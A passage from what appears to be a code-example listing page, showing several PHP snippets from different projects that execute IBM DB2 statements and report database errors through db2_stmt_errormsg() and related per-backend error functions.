     $outcome = @db2_execute($this->_stmt, $params);
     if (false === $outcome) {
         throw new DB2Exception(db2_stmt_errormsg());
     }
     return $outcome;
 }
Esempio n. 26
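 /**
  * Gets a property value in the fetched row given a SQL statement.
  *
  * When several rows are returned, the value from the last row wins. The statement
  * is executed with array(0) as its parameter list, so $sql is presumably expected
  * to contain exactly one parameter marker (verify against callers).
  *
  * @param string     $sql      the sql statement.
  * @param int|string $property the column (index or name) passed to db2_result().
  * @throws Exception when the statement cannot be prepared or executed.
  * @return mixed the property value, or null when no row was fetched.
  */
 public function fetchObjectProperty($sql, $property)
 {
     $propertyValue = null;
     $connection = $this->connect();
     $stmt = db2_prepare($connection, $sql);
     if ($stmt === false) {
         // Without this check a failed prepare would hand false to db2_execute().
         throw new Exception("\nCould not fetch the object from database table. " . db2_stmt_errormsg());
     }
     $result = db2_execute($stmt, array(0));
     if (!$result) {
         $message = "\nCould not fetch the object from database table. " . db2_stmt_errormsg($stmt);
         throw new Exception($message);
     }
     while (db2_fetch_row($stmt)) {
         $propertyValue = db2_result($stmt, $property);
     }
     $this->__destruct();
     return $propertyValue;
 }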
Esempio n. 27
/**
 * Gets the latest database error message.
 *
 * The backend is chosen from $GLOBALS["db_type"]. For ibm_db2 the connection
 * error is used first and the statement error only when that one is empty.
 *
 * @return string The text of the last database error, or "Unknown error" when
 *                the backend reports nothing.  (The type of information varies
 *                depending on which type of database is being used.)
 */
function dbi_error()
{
    if (0 == strcmp($GLOBALS["db_type"], "mysql")) {
        $ret = mysql_error();
    } elseif (0 == strcmp($GLOBALS["db_type"], "mysqli")) {
        $ret = mysqli_error($GLOBALS["db_connection"]);
    } elseif (0 == strcmp($GLOBALS["db_type"], "mssql")) {
        // no real mssql_error function. this is as good as it gets
        $ret = mssql_get_last_message();
    } elseif (0 == strcmp($GLOBALS["db_type"], "oracle")) {
        $ret = OCIError($GLOBALS["oracle_connection"]);
    } elseif (0 == strcmp($GLOBALS["db_type"], "postgresql")) {
        $ret = pg_errormessage($GLOBALS["postgresql_connection"]);
    } elseif (0 == strcmp($GLOBALS["db_type"], "odbc")) {
        // no way to get error from ODBC API
        $ret = "Unknown ODBC error";
    } elseif (0 == strcmp($GLOBALS["db_type"], "ibm_db2")) {
        $ret = db2_conn_errormsg();
        if ($ret == '') {
            $ret = db2_stmt_errormsg();
        }
    } elseif (0 == strcmp($GLOBALS["db_type"], "ibase")) {
        $ret = ibase_errmsg();
    } else {
        $ret = "dbi_error(): db_type not defined.";
    }
    return strlen($ret) ? $ret : "Unknown error";
}
Esempio n. 28
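 /**
  * Prepare a statement handle.
  *
  * @param string $sql
  * @return void
  * @throws Zend_Db_Statement_Db2_Exception when db2_prepare() fails
  */
 public function _prepSql($sql)
 {
     Zend_Db_Statement::_prepSql($sql);
     $connection = $this->_connection->getConnection();
     $this->_stmt = db2_prepare($connection, $sql);
     if (!$this->_stmt) {
         require_once 'Zend/Db/Statement/Db2/Exception.php';
         // $this->_stmt is not a statement resource after a failed prepare, so the
         // driver is asked for its last statement error instead of being passed it.
         throw new Zend_Db_Statement_Db2_Exception(db2_stmt_errormsg(), db2_stmt_error());
     }
 }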
Esempio n. 29
 /**
  * Checks whether a query failed and, if so, throws with the driver's message.
  *
  * A failure is a $result of FALSE or a result object whose getResult() is FALSE.
  * The message source depends on $this->extension.
  *
  * @param  fResult|fUnbufferedResult|boolean $result      The result object for the query
  * @param  mixed                             $extra_info  The sqlite extension will pass a string error message, the oci8 extension will pass the statement resource
  * @param  string                            $sql         The SQL that was executed
  * @throws fSQLException  When the query failed; the message includes the SQL text
  * @return void
  */
 private function checkForError($result, $extra_info = NULL, $sql = NULL)
 {
     if ($result !== FALSE && $result->getResult() !== FALSE) {
         return;
     }
     switch ($this->extension) {
         case 'ibm_db2':
             $message = is_resource($extra_info) ? db2_stmt_errormsg($extra_info) : db2_stmt_errormsg();
             break;
         case 'mssql':
             $message = $this->error;
             unset($this->error);
             break;
         case 'mysql':
             $message = mysql_error($this->connection);
             break;
         case 'mysqli':
             $message = is_object($extra_info) ? $extra_info->error : mysqli_error($this->connection);
             break;
         case 'oci8':
             $error_info = oci_error($extra_info);
             $message = $error_info['message'];
             break;
         case 'pgsql':
             $message = pg_last_error($this->connection);
             break;
         case 'sqlite':
             $message = $extra_info;
             break;
         case 'sqlsrv':
             $error_info = sqlsrv_errors(SQLSRV_ERR_ALL);
             $message = $error_info[0]['message'];
             break;
         case 'pdo':
             $error_info = $extra_info instanceof PDOStatement ? $extra_info->errorInfo() : $this->connection->errorInfo();
             if (empty($error_info[2])) {
                 $error_info[2] = 'Unknown error - this usually indicates a bug in the PDO driver';
             }
             $message = $error_info[2];
             break;
     }
     // Display name for the database type, looked up by $this->type.
     $db_type_map = array('db2' => 'DB2', 'mssql' => 'MSSQL', 'mysql' => 'MySQL', 'oracle' => 'Oracle', 'postgresql' => 'PostgreSQL', 'sqlite' => 'SQLite');
     $failed_sql = is_object($result) ? $result->getSQL() : $sql;
     throw new fSQLException('%1$s error (%2$s) in %3$s', $db_type_map[$this->type], $message, $failed_sql);
 }
 /**
  * Execute a prepared statement with the given values.
  *
  * @param $prepared Resource: the prepared statement
  * @param $args Mixed: either an array of values, or the values themselves as varargs
  * @return Mixed: whatever db2_execute() returned
  */
 public function execute($prepared, $args = null)
 {
     if (!is_array($args)) {
         // Varargs form: everything after $prepared is a value to bind.
         $args = array_slice(func_get_args(), 1);
     }
     $outcome = db2_execute($prepared, $args);
     if (!$outcome) {
         $this->installPrint(db2_stmt_errormsg());
     }
     return $outcome;
 }